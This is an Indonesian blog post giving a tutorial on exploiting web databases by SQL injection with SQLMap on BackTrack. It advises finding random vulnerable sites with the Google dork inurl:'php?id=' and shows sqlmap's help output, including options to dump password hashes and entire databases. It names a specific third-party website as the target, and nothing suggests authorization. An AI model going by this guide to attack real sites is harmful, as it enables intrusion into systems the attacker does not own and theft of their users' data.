saya mau mengulang share tentang eksploitasi database bermodal SQLMAP
di << back | track. Saat ini banyak sekali aplikasi web yang
menggunakan database sebagai data manager, selain mudah dalam
menganalogikanny dengan script PHP, database juga relatif mudah
dioperasikan. Tapi database juga memiliki kelemahan dalam pertahanan dan
sekuritasnya. Makanya eksploitasi database relatif mudah dilakukan.
Konsep dari penyerangan ini sendiri
adalah assessment, mapping, lalu auditing. Klasiknya dengan
memanfaatkan Mantra untuk menjajal payload database yang kira-kira
cocok. Mudahnya dengan menggunakan SQLMap untuk menentukan payload yang
bisa digunakan untuk eksploitasi database
Tool's Yang diperlukan:
SQLMap download di sini.Langkah
pertama adalah memahami konsep SQL injection, untuk mempersingkat
waktu, saya tidak akan menjelaskannya di sini. Secara garis besar, kamu
harus memanfaatkan alamat web dengan embel-embel "blablabla.php?id=xx".
Dimana "xx" adalah karakter unik yang merujuk pada sebuah database.
Untuk mencari target URL seperti ini. Gunakan Google dork. Caranya,
ketik ini pada Google search bar:
inurl:"php?id="
Lalu
"Enter", dan beberapa website dengan embel-embel URL "php?id=" akan
tampil. Pilih salah satu kemudian buka websitenya. Tekan CTRL + L lalu
CTRL + C, ini berfungsi untuk mengkopi semua isi URL pada address bar.
Lanjut, buka terminal, lalu ikuti modul berikut:
root@bt:~# cd /pentest/database/sqlmap/
root@bt : /pentest/database/sqlmap# ./sqlmap.py --help
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
Usage: python ./sqlmap.py [options]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be specified to set the source to
get target urls from.
-d DIRECT Direct connection to the database
-u URL, --url=URL Target url
[snip...]
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--count Retrieve number of entries for table(s)
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
[snip...]
Setelah itu kita dapat mengetahui command dasar untuk menggunakan sqlmap, mulailah bereksplorasi (= Kali ini saya menggunakan website:
http://www(dot)esteler77(dot)com/product.php?subnav=14&subs=18
coursey by : www (dot) double-dragon(dot)blogspot(dot)com
0 comments:
Post a Comment